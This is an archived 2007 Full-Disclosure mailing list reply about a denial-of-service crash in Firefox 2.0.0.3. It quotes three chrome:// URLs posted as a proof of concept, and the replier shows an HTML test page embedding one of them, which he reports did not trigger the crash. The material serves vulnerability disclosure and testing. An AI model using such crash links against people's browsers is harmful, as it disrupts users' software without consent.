Re: [Full-disclosure] Firefox 2.0.0.3 DoS crash

Fri, 20 Apr 2007 10:18:38 -0700 

On Thu, 2007-04-19 at 20:22 +0200, carl hardwick wrote:
> Firefox 2.0.0.3 DoS crash
> 
> PoC:
> chrome://pippki/content/editcacert.xul
> chrome://pippki/content/editemailcert.xul
> chrome://pippki/content/editsslcert.xul

Works for me on Linux when clicking on such link.

Meanwhile I tried to embed it into webpage and did not work. 

[EMAIL PROTECTED]:~/Desktop> cat poc.html
<html>
<body>
<img src="chrome://pippki/content/editcacert.xul" />
<iframe src="chrome://pippki/content/editcacert.xul" ></iframe>
<object src="chrome://pippki/content/editcacert.xul"
type="text/html"></object>
<script src="chrome://pippki/content/editcacert.xul" ></script>
</body>
</html>
[EMAIL PROTECTED]:~/Desktop>


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Reply via email to